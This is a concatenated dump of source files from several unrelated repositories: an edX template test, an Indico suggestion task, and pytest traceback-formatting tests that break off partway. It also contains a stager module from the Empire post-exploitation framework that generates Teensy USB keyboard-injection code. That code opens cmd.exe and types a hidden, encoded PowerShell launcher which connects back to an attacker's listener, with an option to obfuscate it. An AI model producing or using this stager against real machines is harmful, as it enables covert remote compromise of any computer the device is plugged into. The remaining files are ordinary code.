test.main()
|
y12uc231/edx-platform | refs/heads/master | common/lib/xmodule/xmodule/tests/test_mako_module.py | 261 | """ Test mako_module.py """
from unittest import TestCase
from mock import Mock
from xmodule.mako_module import MakoModuleDescriptor
class MakoModuleTest(TestCase):
""" Test MakoModuleDescriptor """
def test_render_template_check(self):
mock_system = Mock()
mock_system.render_template = None
with self.assertRaises(TypeError):
MakoModuleDescriptor(mock_system, {})
del mock_system.render_template
with self.assertRaises(TypeError):
MakoModuleDescriptor(mock_system, {})
|
frohoff/Empire | refs/heads/master | lib/stagers/windows/teensy.py | 12 | from lib.common import helpers
class Stager:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'TeensyLauncher',
'Author': ['@matterpreter'],
            'Description': ('Generates a Teensy script that runs a one-liner stage0 launcher for Empire.'),
'Comments': [
''
]
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Listener' : {
'Description' : 'Listener to generate stager for.',
'Required' : True,
'Value' : ''
},
'Language' : {
'Description' : 'Language of the stager to generate.',
'Required' : True,
'Value' : 'powershell'
},
'StagerRetries' : {
'Description' : 'Times for the stager to retry connecting.',
'Required' : False,
'Value' : '0'
},
'OutFile' : {
'Description' : 'File to output duckyscript to.',
'Required' : True,
'Value' : '/tmp/teensy.ino'
},
'Obfuscate' : {
'Description' : 'Switch. Obfuscate the launcher powershell code, uses the ObfuscateCommand for obfuscation types. For powershell only.',
'Required' : False,
'Value' : 'False'
},
'ObfuscateCommand' : {
'Description' : 'The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.',
'Required' : False,
'Value' : r'Token\All\1'
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
# extract all of our options
language = self.options['Language']['Value']
listenerName = self.options['Listener']['Value']
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
stagerRetries = self.options['StagerRetries']['Value']
obfuscate = self.options['Obfuscate']['Value']
obfuscateCommand = self.options['ObfuscateCommand']['Value']
obfuscateScript = False
if obfuscate.lower() == "true":
obfuscateScript = True
# generate the launcher code
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language=language, encode=True, obfuscate=obfuscateScript, obfuscationCommand=obfuscateCommand, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, stagerRetries=stagerRetries)
if launcher == "":
print helpers.color("[!] Error in launcher command generation.")
return ""
        elif obfuscateScript and "launcher" in obfuscateCommand.lower():
print helpers.color("[!] If using obfuscation, LAUNCHER obfuscation cannot be used in the teensy stager.")
return ""
else:
enc = launcher.split(" ")[-1]
sendEnc = "Keyboard.print(\""
sendEnc += enc
sendEnc += "\");\n"
teensyCode = "unsigned int lock_check_wait = 1000;\n"
teensyCode += "int ledKeys(void) {return int(keyboard_leds);}\n"
teensyCode += "boolean isLockOn(void) {\n"
teensyCode += " return ((ledKeys() & 2) == 2) ? true : false;\n"
teensyCode += "}\n\n"
teensyCode += "void clearKeys (){\n"
teensyCode += " delay(200);\n"
teensyCode += " Keyboard.set_key1(0);\n"
teensyCode += " Keyboard.set_key2(0);\n"
teensyCode += " Keyboard.set_key3(0);\n"
teensyCode += " Keyboard.set_key4(0);\n"
teensyCode += " Keyboard.set_key5(0);\n"
teensyCode += " Keyboard.set_key6(0);\n"
teensyCode += " Keyboard.set_modifier(0);\n"
teensyCode += " Keyboard.send_now();\n"
teensyCode += "}\n\n"
teensyCode += "void toggleLock(void) {\n"
teensyCode += " Keyboard.set_key1(KEY_CAPS_LOCK);\n"
teensyCode += " Keyboard.send_now();\n"
teensyCode += " clearKeys();\n"
teensyCode += "}\n\n"
teensyCode += "void wait_for_drivers(void) {\n"
teensyCode += " boolean numLockTrap = isLockOn();\n"
teensyCode += " while(numLockTrap == isLockOn()) {\n"
teensyCode += " toggleLock();\n"
teensyCode += " delay(lock_check_wait);\n"
teensyCode += " }\n"
teensyCode += " toggleLock();\n"
teensyCode += " delay(lock_check_wait);\n"
teensyCode += "}\n\n"
teensyCode += "void win_minWindows(void) {\n"
teensyCode += " delay(300);\n"
teensyCode += " Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);\n"
teensyCode += " Keyboard.set_key1(KEY_M);\n"
teensyCode += " Keyboard.send_now();\n"
teensyCode += " clearKeys();\n"
teensyCode += "}\n\n"
teensyCode += "void win_restoreWindows(void) {\n"
teensyCode += " delay(300);\n"
teensyCode += " Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);\n"
teensyCode += " Keyboard.send_now();\n"
teensyCode += " Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI | MODIFIERKEY_SHIFT);\n"
teensyCode += " Keyboard.send_now();\n"
teensyCode += " Keyboard.set_key1(KEY_M);\n"
teensyCode += " Keyboard.send_now();\n"
teensyCode += " clearKeys();\n"
teensyCode += "}\n\n"
teensyCode += "void win_run(void) {\n"
teensyCode += " Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);\n"
teensyCode += " Keyboard.set_key1(KEY_R);\n"
teensyCode += " Keyboard.send_now();\n"
teensyCode += " clearKeys();\n"
teensyCode += "}\n\n"
teensyCode += "void win_openCmd(void) {\n"
teensyCode += " delay(300);\n"
teensyCode += " win_run();\n"
teensyCode += " Keyboard.print(\"cmd.exe\");\n"
teensyCode += " Keyboard.set_key1(KEY_ENTER);\n"
teensyCode += " Keyboard.send_now();\n"
teensyCode += " clearKeys();\n"
teensyCode += "}\n\n"
teensyCode += "void empire(void) {\n"
teensyCode += " wait_for_drivers();\n"
teensyCode += " win_minWindows();\n"
teensyCode += " delay(1000);\n"
teensyCode += " win_openCmd();\n"
teensyCode += " delay(1000);\n"
teensyCode += " Keyboard.print(\"powershell -W Hidden -nop -noni -enc \");\n"
teensyCode += " "
teensyCode += sendEnc
teensyCode += " Keyboard.set_key1(KEY_ENTER);\n"
teensyCode += " Keyboard.send_now();\n"
teensyCode += " clearKeys();\n"
teensyCode += " win_restoreWindows();\n"
teensyCode += "}\n\n"
teensyCode += "void setup(void) {\n"
teensyCode += " empire();\n"
teensyCode += "}\n\n"
teensyCode += "void loop() {}"
return teensyCode
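    # A minimal usage sketch (hypothetical values; inside Empire the stager
    # menu normally drives this class rather than direct instantiation):
    #
    #     stager = Stager(mainMenu, params=[('Listener', 'http'),
    #                                       ('OutFile', '/tmp/teensy.ino')])
    #     ino = stager.generate()
    #     open(stager.options['OutFile']['Value'], 'w').write(ino)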
|
Ictp/indico | refs/heads/master | indico/modules/scheduler/tasks/suggestions.py | 2 | # -*- coding: utf-8 -*-
##
##
## This file is part of Indico.
## Copyright (C) 2002 - 2014 European Organization for Nuclear Research (CERN).
##
## Indico is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 3 of the
## License, or (at your option) any later version.
##
## Indico is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Indico; if not, see <http://www.gnu.org/licenses/>.
from MaKaC.user import AvatarHolder
from indico.modules.scheduler.tasks.periodic import PeriodicTask
from indico.util.suggestions import get_category_scores
from indico.util.redis import write_client as redis_write_client
import indico.util.redis.suggestions as redis_suggestions
# Minimum score for a category to be suggested
SUGGESTION_MIN_SCORE = 0.25
class CategorySuggestionTask(PeriodicTask):
def _update_suggestions(self, avatar):
for category, score in get_category_scores(avatar).iteritems():
if score < SUGGESTION_MIN_SCORE:
continue
#print 'Suggest category for %r: %r (%.03f)' % (avatar, category, score)
redis_suggestions.suggest(avatar, 'category', category.getId(), score)
def run(self):
if not redis_write_client:
return
while True:
avatar_id = redis_suggestions.next_scheduled_check()
if avatar_id is None:
break
avatar = AvatarHolder().getById(avatar_id)
if avatar:
self._update_suggestions(avatar)
redis_suggestions.unschedule_check(avatar_id)
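    # Processing sketch: run() drains the redis queue one avatar id at a time;
    # ``next_scheduled_check`` returning None ends the pass, and each handled
    # id is only removed afterwards via ``unschedule_check``, so a crash
    # mid-run leaves unprocessed ids queued for the next periodic run.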
|
mohammed-alfatih/servo | refs/heads/master | tests/wpt/web-platform-tests/tools/pytest/testing/code/test_excinfo.py | 165 | # -*- coding: utf-8 -*-
import _pytest
import py
import pytest
from _pytest._code.code import FormattedExcinfo, ReprExceptionInfo
queue = py.builtin._tryimport('queue', 'Queue')
failsonjython = pytest.mark.xfail("sys.platform.startswith('java')")
from test_source import astonly
try:
import importlib
except ImportError:
invalidate_import_caches = None
else:
invalidate_import_caches = getattr(importlib, "invalidate_caches", None)
import pytest
pytest_version_info = tuple(map(int, pytest.__version__.split(".")[:3]))
class TWMock:
def __init__(self):
self.lines = []
def sep(self, sep, line=None):
self.lines.append((sep, line))
def line(self, line, **kw):
self.lines.append(line)
def markup(self, text, **kw):
return text
fullwidth = 80
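# TWMock stands in for a py.io.TerminalWriter: repr objects call line()/sep()
# on it and the tests then assert on the captured ``lines`` list, e.g.:
#
#     tw = TWMock()
#     some_repr.toterminal(tw)
#     assert tw.lines[-1].endswith("ValueError")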
def test_excinfo_simple():
try:
raise ValueError
except ValueError:
info = _pytest._code.ExceptionInfo()
assert info.type == ValueError
def test_excinfo_getstatement():
def g():
raise ValueError
def f():
g()
try:
f()
except ValueError:
excinfo = _pytest._code.ExceptionInfo()
linenumbers = [_pytest._code.getrawcode(f).co_firstlineno - 1 + 3,
_pytest._code.getrawcode(f).co_firstlineno - 1 + 1,
_pytest._code.getrawcode(g).co_firstlineno - 1 + 1, ]
l = list(excinfo.traceback)
foundlinenumbers = [x.lineno for x in l]
assert foundlinenumbers == linenumbers
#for x in info:
# print "%s:%d %s" %(x.path.relto(root), x.lineno, x.statement)
#xxx
# testchain for getentries test below
def f():
#
raise ValueError
#
def g():
#
__tracebackhide__ = True
f()
#
def h():
#
g()
#
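# Note: ``__tracebackhide__ = True`` marks a frame for Traceback.filter() to
# drop, so the g() frame above disappears from filtered tracebacks; this is
# what test_traceback_filter and the getcrashentry tests below rely on.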
class TestTraceback_f_g_h:
def setup_method(self, method):
try:
h()
except ValueError:
self.excinfo = _pytest._code.ExceptionInfo()
def test_traceback_entries(self):
tb = self.excinfo.traceback
entries = list(tb)
assert len(tb) == 4 # maybe fragile test
assert len(entries) == 4 # maybe fragile test
names = ['f', 'g', 'h']
for entry in entries:
try:
names.remove(entry.frame.code.name)
except ValueError:
pass
assert not names
def test_traceback_entry_getsource(self):
tb = self.excinfo.traceback
s = str(tb[-1].getsource() )
assert s.startswith("def f():")
assert s.endswith("raise ValueError")
@astonly
@failsonjython
def test_traceback_entry_getsource_in_construct(self):
source = _pytest._code.Source("""\
def xyz():
try:
raise ValueError
except somenoname:
pass
xyz()
""")
try:
exec (source.compile())
except NameError:
tb = _pytest._code.ExceptionInfo().traceback
print (tb[-1].getsource())
s = str(tb[-1].getsource())
assert s.startswith("def xyz():\n try:")
assert s.strip().endswith("except somenoname:")
def test_traceback_cut(self):
co = _pytest._code.Code(f)
path, firstlineno = co.path, co.firstlineno
traceback = self.excinfo.traceback
newtraceback = traceback.cut(path=path, firstlineno=firstlineno)
assert len(newtraceback) == 1
newtraceback = traceback.cut(path=path, lineno=firstlineno+2)
assert len(newtraceback) == 1
def test_traceback_cut_excludepath(self, testdir):
p = testdir.makepyfile("def f(): raise ValueError")
excinfo = pytest.raises(ValueError, "p.pyimport().f()")
basedir = py.path.local(pytest.__file__).dirpath()
newtraceback = excinfo.traceback.cut(excludepath=basedir)
for x in newtraceback:
if hasattr(x, 'path'):
assert not py.path.local(x.path).relto(basedir)
assert newtraceback[-1].frame.code.path == p
def test_traceback_filter(self):
traceback = self.excinfo.traceback
ntraceback = traceback.filter()
assert len(ntraceback) == len(traceback) - 1
def test_traceback_recursion_index(self):
def f(n):
if n < 10:
n += 1
f(n)
excinfo = pytest.raises(RuntimeError, f, 8)
traceback = excinfo.traceback
recindex = traceback.recursionindex()
assert recindex == 3
def test_traceback_only_specific_recursion_errors(self, monkeypatch):
def f(n):
if n == 0:
raise RuntimeError("hello")
f(n-1)
excinfo = pytest.raises(RuntimeError, f, 100)
monkeypatch.delattr(excinfo.traceback.__class__, "recursionindex")
repr = excinfo.getrepr()
assert "RuntimeError: hello" in str(repr.reprcrash)
def test_traceback_no_recursion_index(self):
def do_stuff():
raise RuntimeError
def reraise_me():
import sys
exc, val, tb = sys.exc_info()
py.builtin._reraise(exc, val, tb)
def f(n):
try:
do_stuff()
except:
reraise_me()
excinfo = pytest.raises(RuntimeError, f, 8)
traceback = excinfo.traceback
recindex = traceback.recursionindex()
assert recindex is None
def test_traceback_messy_recursion(self):
#XXX: simplified locally testable version
decorator = pytest.importorskip('decorator').decorator
def log(f, *k, **kw):
print('%s %s' % (k, kw))
f(*k, **kw)
log = decorator(log)
def fail():
raise ValueError('')
fail = log(log(fail))
excinfo = pytest.raises(ValueError, fail)
assert excinfo.traceback.recursionindex() is None
def test_traceback_getcrashentry(self):
def i():
__tracebackhide__ = True
raise ValueError
def h():
i()
def g():
__tracebackhide__ = True
h()
def f():
g()
excinfo = pytest.raises(ValueError, f)
tb = excinfo.traceback
entry = tb.getcrashentry()
co = _pytest._code.Code(h)
assert entry.frame.code.path == co.path
assert entry.lineno == co.firstlineno + 1
assert entry.frame.code.name == 'h'
def test_traceback_getcrashentry_empty(self):
def g():
__tracebackhide__ = True
raise ValueError
def f():
__tracebackhide__ = True
g()
excinfo = pytest.raises(ValueError, f)
tb = excinfo.traceback
entry = tb.getcrashentry()
co = _pytest._code.Code(g)
assert entry.frame.code.path == co.path
assert entry.lineno == co.firstlineno + 2
assert entry.frame.code.name == 'g'
def hello(x):
x + 5
def test_tbentry_reinterpret():
try:
hello("hello")
except TypeError:
excinfo = _pytest._code.ExceptionInfo()
tbentry = excinfo.traceback[-1]
msg = tbentry.reinterpret()
assert msg.startswith("TypeError: ('hello' + 5)")
def test_excinfo_exconly():
excinfo = pytest.raises(ValueError, h)
assert excinfo.exconly().startswith('ValueError')
excinfo = pytest.raises(ValueError,
"raise ValueError('hello\\nworld')")
msg = excinfo.exconly(tryshort=True)
assert msg.startswith('ValueError')
assert msg.endswith("world")
def test_excinfo_repr():
excinfo = pytest.raises(ValueError, h)
s = repr(excinfo)
assert s == "<ExceptionInfo ValueError tblen=4>"
def test_excinfo_str():
excinfo = pytest.raises(ValueError, h)
s = str(excinfo)
assert s.startswith(__file__[:-9]) # pyc file and $py.class
assert s.endswith("ValueError")
assert len(s.split(":")) >= 3 # on windows it's 4
def test_excinfo_errisinstance():
excinfo = pytest.raises(ValueError, h)
assert excinfo.errisinstance(ValueError)
def test_excinfo_no_sourcecode():
try:
exec ("raise ValueError()")
except ValueError:
excinfo = _pytest._code.ExceptionInfo()
s = str(excinfo.traceback[-1])
if py.std.sys.version_info < (2,5):
assert s == " File '<string>':1 in ?\n ???\n"
else:
assert s == " File '<string>':1 in <module>\n ???\n"
def test_excinfo_no_python_sourcecode(tmpdir):
#XXX: simplified locally testable version
tmpdir.join('test.txt').write("{{ h()}}:")
jinja2 = pytest.importorskip('jinja2')
loader = jinja2.FileSystemLoader(str(tmpdir))
env = jinja2.Environment(loader=loader)
template = env.get_template('test.txt')
excinfo = pytest.raises(ValueError,
template.render, h=h)
for item in excinfo.traceback:
print(item) #XXX: for some reason jinja.Template.render is printed in full
item.source # shouldnt fail
if item.path.basename == 'test.txt':
assert str(item.source) == '{{ h()}}:'
def test_entrysource_Queue_example():
try:
queue.Queue().get(timeout=0.001)
except queue.Empty:
excinfo = _pytest._code.ExceptionInfo()
entry = excinfo.traceback[-1]
source = entry.getsource()
assert source is not None
s = str(source).strip()
assert s.startswith("def get")
def test_codepath_Queue_example():
try:
queue.Queue().get(timeout=0.001)
except queue.Empty:
excinfo = _pytest._code.ExceptionInfo()
entry = excinfo.traceback[-1]
path = entry.path
assert isinstance(path, py.path.local)
assert path.basename.lower() == "queue.py"
assert path.check()
class TestFormattedExcinfo:
def pytest_funcarg__importasmod(self, request):
def importasmod(source):
source = _pytest._code.Source(source)
tmpdir = request.getfuncargvalue("tmpdir")
modpath = tmpdir.join("mod.py")
tmpdir.ensure("__init__.py")
modpath.write(source)
if invalidate_import_caches is not None:
invalidate_import_caches()
return modpath.pyimport()
return importasmod
def excinfo_from_exec(self, source):
source = _pytest._code.Source(source).strip()
try:
exec (source.compile())
except KeyboardInterrupt:
raise
except:
return _pytest._code.ExceptionInfo()
assert 0, "did not raise"
def test_repr_source(self):
pr = FormattedExcinfo()
source = _pytest._code.Source("""
def f(x):
pass
""").strip()
pr.flow_marker = "|"
lines = pr.get_source(source, 0)
assert len(lines) == 2
assert lines[0] == "| def f(x):"
assert lines[1] == " pass"
def test_repr_source_excinfo(self):
""" check if indentation is right """
pr = FormattedExcinfo()
excinfo = self.excinfo_from_exec("""
def f():
assert 0
f()
""")
pr = FormattedExcinfo()
source = pr._getentrysource(excinfo.traceback[-1])
lines = pr.get_source(source, 1, excinfo)
assert lines == [
' def f():',
'> assert 0',
'E assert 0'
]
def test_repr_source_not_existing(self):
pr = FormattedExcinfo()
co = compile("raise ValueError()", "", "exec")
try:
exec (co)
except ValueError:
excinfo = _pytest._code.ExceptionInfo()
repr = pr.repr_excinfo(excinfo)
assert repr.reprtraceback.reprentries[1].lines[0] == "> ???"
def test_repr_many_line_source_not_existing(self):
pr = FormattedExcinfo()
co = compile("""
a = 1
raise ValueError()
""", "", "exec")
try:
exec (co)
except ValueError:
excinfo = _pytest._code.ExceptionInfo()
repr = pr.repr_excinfo(excinfo)
assert repr.reprtraceback.reprentries[1].lines[0] == "> ???"
def test_repr_source_failing_fullsource(self):
pr = FormattedExcinfo()
class FakeCode(object):
class raw:
co_filename = '?'
path = '?'
firstlineno = 5
def fullsource(self):
return None
fullsource = property(fullsource)
class FakeFrame(object):
code = FakeCode()
f_locals = {}
f_globals = {}
class FakeTracebackEntry(_pytest._code.Traceback.Entry):
def __init__(self, tb):
self.lineno = 5+3
@property
def frame(self):
return FakeFrame()
class Traceback(_pytest._code.Traceback):
Entry = FakeTracebackEntry
class FakeExcinfo(_pytest._code.ExceptionInfo):
typename = "Foo"
def __init__(self):
pass
def exconly(self, tryshort):
return "EXC"
def errisinstance(self, cls):
return False
excinfo = FakeExcinfo()
class FakeRawTB(object):
tb_next = None
tb = FakeRawTB()
excinfo.traceback = Traceback(tb)
fail = IOError() # noqa
repr = pr.repr_excinfo(excinfo)
assert repr.reprtraceback.reprentries[0].lines[0] == "> ???"
fail = py.error.ENOENT # noqa
repr = pr.repr_excinfo(excinfo)
assert repr.reprtraceback.reprentries[0].lines[0] == "> ???"
def test_repr_local(self):
p = FormattedExcinfo(showlocals=True)
loc = {'y': 5, 'z': 7, 'x': 3, '@x': 2, '__builtins__': {}}
reprlocals = p.repr_locals(loc)
assert reprlocals.lines
assert reprlocals.lines[0] == '__builtins__ = <builtins>'
assert reprlocals.lines[1] == 'x = 3'
assert reprlocals.lines[2] == 'y = 5'
assert reprlocals.lines[3] == 'z = 7'
def test_repr_tracebackentry_lines(self, importasmod):
mod = importasmod("""
def func1():
raise ValueError("hello\\nworld")
""")
excinfo = pytest.raises(ValueError, mod.func1)
excinfo.traceback = excinfo.traceback.filter()
p = FormattedExcinfo()
reprtb = p.repr_traceback_entry(excinfo.traceback[-1])
# test as intermittent entry
lines = reprtb.lines
assert lines[0] == ' def func1():'
assert lines[1] == '> raise ValueError("hello\\nworld")'
# test as last entry
p = FormattedExcinfo(showlocals=True)
repr_entry = p.repr_traceback_entry(excinfo.traceback[-1], excinfo)
lines = repr_entry.lines
assert lines[0] == ' def func1():'
assert lines[1] == '> raise ValueError("hello\\nworld")'
assert lines[2] == 'E ValueError: hello'
assert lines[3] == 'E world'
assert not lines[4:]
loc = repr_entry.reprlocals is not None
loc = repr_entry.reprfileloc
assert loc.path == mod.__file__
assert loc.lineno == 3
#assert loc.message == "ValueError: hello"
def test_repr_tracebackentry_lines2(self, importasmod):
mod = importasmod("""
def func1(m, x, y, z):
raise ValueError("hello\\nworld")
""")
excinfo = pytest.raises(ValueError, mod.func1, "m"*90, 5, 13, "z"*120)
excinfo.traceback = excinfo.traceback.filter()
entry = excinfo.traceback[-1]
p = FormattedExcinfo(funcargs=True)
reprfuncargs = p.repr_args(entry)
assert reprfuncargs.args[0] == ('m', repr("m"*90))
assert reprfuncargs.args[1] == ('x', '5')
assert reprfuncargs.args[2] == ('y', '13')
assert reprfuncargs.args[3] == ('z', repr("z" * 120))
p = FormattedExcinfo(funcargs=True)
repr_entry = p.repr_traceback_entry(entry)
assert repr_entry.reprfuncargs.args == reprfuncargs.args
tw = TWMock()
repr_entry.toterminal(tw)
assert tw.lines[0] == "m = " + repr('m' * 90)
assert tw.lines[1] == "x = 5, y = 13"
assert tw.lines[2] == "z = " + repr('z' * 120)
def test_repr_tracebackentry_lines_var_kw_args(self, importasmod):
mod = importasmod("""
def func1(x, *y, **z):
raise ValueError("hello\\nworld")
""")
excinfo = pytest.raises(ValueError, mod.func1, 'a', 'b', c='d')
excinfo.traceback = excinfo.traceback.filter()
entry = excinfo.traceback[-1]
p = FormattedExcinfo(funcargs=True)
reprfuncargs = p.repr_args(entry)
assert reprfuncargs.args[0] == ('x', repr('a'))
assert reprfuncargs.args[1] == ('y', repr(('b',)))
assert reprfuncargs.args[2] == ('z', repr({'c': 'd'}))
p = FormattedExcinfo(funcargs=True)
repr_entry = p.repr_traceback_entry(entry)
assert repr_entry.reprfuncargs.args == reprfuncargs.args
tw = TWMock()
repr_entry.toterminal(tw)
assert tw.lines[0] == "x = 'a', y = ('b',), z = {'c': 'd'}"
def test_repr_tracebackentry_short(self, importasmod):
mod = importasmod("""
def func1():
raise ValueError("hello")
def entry():
func1()
""")
excinfo = pytest.raises(ValueError, mod.entry)
p = FormattedExcinfo(style="short")
reprtb = p.repr_traceback_entry(excinfo.traceback[-2])
lines = reprtb.lines
basename = py.path.local(mod.__file__).basename
assert lines[0] == ' func1()'
assert basename in str(reprtb.reprfileloc.path)
assert reprtb.reprfileloc.lineno == 5
# test last entry
p = FormattedExcinfo(style="short")
reprtb = p.repr_traceback_entry(excinfo.traceback[-1], excinfo)
lines = reprtb.lines
assert lines[0] == ' raise ValueError("hello")'
assert lines[1] == 'E ValueError: hello'
assert basename in str(reprtb.reprfileloc.path)
assert reprtb.reprfileloc.lineno == 3
def test_repr_tracebackentry_no(self, importasmod):
mod = importasmod("""
def func1():
raise ValueError("hello")
def entry():
func1()
""")
excinfo = pytest.raises(ValueError, mod.entry)
p = FormattedExcinfo(style="no")
p.repr_traceback_entry(excinfo.traceback[-2])
p = FormattedExcinfo(style="no")
reprentry = p.repr_traceback_entry(excinfo.traceback[-1], excinfo)
lines = reprentry.lines
assert lines[0] == 'E ValueError: hello'
assert not lines[1:]
def test_repr_traceback_tbfilter(self, importasmod):
mod = importasmod("""
def f(x):
raise ValueError(x)
def entry():
f(0)
""")
excinfo = pytest.raises(ValueError, mod.entry)
p = FormattedExcinfo(tbfilter=True)
reprtb = p.repr_traceback(excinfo)
assert len(reprtb.reprentries) == 2
p = FormattedExcinfo(tbfilter=False)
reprtb = p.repr_traceback(excinfo)
assert len(reprtb.reprentries) == 3
def test_traceback_short_no_source(self, importasmod, monkeypatch):
mod = importasmod("""
def func1():
raise ValueError("hello")
def entry():
func1()
""")
excinfo = pytest.raises(ValueError, mod.entry)
from _pytest._code.code import Code
monkeypatch.setattr(Code, 'path', 'bogus')
excinfo.traceback[0].frame.code.path = "bogus"
p = FormattedExcinfo(style="short")
reprtb = p.repr_traceback_entry(excinfo.traceback[-2])
lines = reprtb.lines
last_p = FormattedExcinfo(style="short")
last_reprtb = last_p.repr_traceback_entry(excinfo.traceback[-1], excinfo)
last_lines = last_reprtb.lines
monkeypatch.undo()
assert lines[0] == ' func1()'
assert last_lines[0] == ' raise ValueError("hello")'
assert last_lines[1] == 'E ValueError: hello'
def test_repr_traceback_and_excinfo(self, importasmod):
mod = importasmod("""
def f(x):
raise ValueError(x)
def entry():
f(0)
""")
excinfo = pytest.raises(ValueError, mod.entry)
for style in ("long", "short"):
p = FormattedExcinfo(style=style)
reprtb = p.repr_traceback(excinfo)
assert len(reprtb.reprentries) == 2
assert reprtb.style == style
assert not reprtb.extraline
repr = p.repr_excinfo(excinfo)
assert repr.reprtraceback
assert len(repr.reprtraceback.reprentries) == len(reprtb.reprentries)
assert repr.reprcrash.path.endswith("mod.py")
assert repr.reprcrash.message == "ValueError: 0"
def test_repr_traceback_with_invalid_cwd(self, importasmod, monkeypatch):
mod = importasmod("""
def f(x):
raise ValueError(x)
def entry():
f(0)
""")
excinfo = pytest.raises(ValueError, mod.entry)
p = FormattedExcinfo()
def raiseos():
raise OSError(2)
monkeypatch.setattr(py.std.os, 'getcwd', raiseos)
assert p._makepath(__file__) == __file__
p.repr_traceback(excinfo)
def test_repr_excinfo_addouterr(self, importasmod):
mod = importasmod("""
def entry():
raise ValueError()
""")
excinfo = pytest.raises(ValueError, mod.entry)
repr = excinfo.getrepr()
repr.addsection("title", "content")
twmock = TWMock()
repr.toterminal(twmock)
assert twmock.lines[-1] == "content"
assert twmock.lines[-2] == ("-", "title")
def test_repr_excinfo_reprcrash(self, importasmod):
mod = importasmod("""
def entry():
raise ValueError()
""")
excinfo = pytest.raises(ValueError, mod.entry)
repr = excinfo.getrepr()
assert repr.reprcrash.path.endswith("mod.py")
assert repr.reprcrash.lineno == 3
assert repr.reprcrash.message == "ValueError"
assert str(repr.reprcrash).endswith("mod.py:3: ValueError")
def test_repr_traceback_recursion(self, importasmod):
mod = importasmod("""
def rec2(x):
return rec1(x+1)
def rec1(x):
return rec2(x-1)
def entry():
rec1(42)
""")
excinfo = pytest.raises(RuntimeError, mod.entry)
for style in ("short", "long", "no"):
p = FormattedExcinfo(style="short")
reprtb = p.repr_traceback(excinfo)
assert reprtb.extraline == "!!! Recursion detected (same locals & position)"
assert str(reprtb)
def test_tb_entry_AssertionError(self, importasmod):
# probably this test is a bit redundant
# as py/magic/testing/test_assertion.py
# already tests correctness of
# assertion-reinterpretation logic
mod = importasmod("""
def somefunc():
x = 1
assert x == 2
""")
excinfo = pytest.raises(AssertionError, mod.somefunc)
p = FormattedExcinfo()
reprentry = p.repr_traceback_entry(excinfo.traceback[-1], excinfo)
lines = reprentry.lines
assert lines[-1] == "E assert 1 == 2"
def test_reprexcinfo_getrepr(self, importasmod):
mod = importasmod("""
def f(x):
raise ValueError(x)
def entry():
f(0)
""")
excinfo = pytest.raises(ValueError, mod.entry)
for style in ("short", "long", "no"):
for showlocals in (True, False):
repr = excinfo.getrepr(style=style, showlocals=showlocals)
assert isinstance(repr, ReprExceptionInfo)
assert repr.reprtraceback.style == style
def test_reprexcinfo_unicode(self):
from _pytest._code.code import TerminalRepr
class MyRepr(TerminalRepr):
def toterminal(self, tw):
tw.line(py.builtin._totext("я", "utf-8"))
x = py.builtin._totext(MyRepr())
assert x == py.builtin._totext("я", "utf-8")
def test_toterminal_long(self, importasmod):
mod = importasmod("""
def g(x):
raise ValueError(x)
def f():
g(3)
""")
excinfo = pytest.raises(ValueError, mod.f)
excinfo.traceback = excinfo.traceback.filter()
repr = excinfo.getrepr()
tw = TWMock()
repr.toterminal(tw)
assert tw.lines[0] == ""
tw.lines.pop(0)
assert tw.lines[0] == " def f():"
assert tw.lines[1] == "> g(3)"
assert tw.lines[2] == ""
assert tw.lines[3].endswith("mod.py:5: ")
assert tw.lines[4] == ("_ ", None)
assert tw.lines[5] == ""
assert tw.lines[6] == " def g(x):"
assert tw.lines[7] == "> raise ValueError(x)"
assert tw.lines[8] == "E ValueError: 3"
assert tw.lines[9] == ""
assert tw.lines[10].endswith("mod.py:3: ValueError")
def test_toterminal_long_missing_source(self, importasmod, tmpdir):
mod = importasmod("""
def g(x):
raise ValueError(x)
def f():
g(3)
""")
excinfo = pytest.raises(ValueError, mod.f)
tmpdir.join('mod.py').remove()
excinfo.traceback = excinfo.traceback.filter()
repr = excinfo.getrepr()
tw = TWMock()
repr.toterminal(tw)
assert tw.lines[0] == ""
tw.lines.pop(0)
assert tw.lines[0] == "> ???"
assert tw.lines[1] == ""
assert tw.lines[2].endswith("mod.py:5: ")
assert tw.lines[3] == ("_ ", None)
assert tw.lines[4] == ""
assert tw.lines[5] == "> ???"
assert tw.lines[6] == "E ValueError: 3"
assert tw.lines[7] == ""
assert tw.lines[8].endswith("mod.py:3: ValueError")
def test_toterminal_long_incomplete_source(self, importasmod, tmpdir):
mod = importasmod("""
def g(x):
raise ValueError(x)
def f():
g(3)
""")
excinfo = pytest.raises(ValueError, mod.f)
tmpdir.join('mod.py').write('asdf')
excinfo.traceback = excinfo.traceback.filter()
repr = excinfo.getrepr()
tw = TWMock()
repr.toterminal(tw)
assert tw.lines[0] == ""
tw.lines.pop(0)
assert tw.lines[0] == "> ???"
assert tw.lines[1] == ""
assert tw.lines[2].endswith("mod.py:5: ")
assert tw.lines[3] == ("_ ", None)
assert tw.lines[4] == ""
assert tw.lines[5] == "> ???"
assert tw.lines[6] == "E ValueError: 3"
assert tw.lines[7] == ""
assert tw.lines[8].endswith("mod.py:3: ValueError")
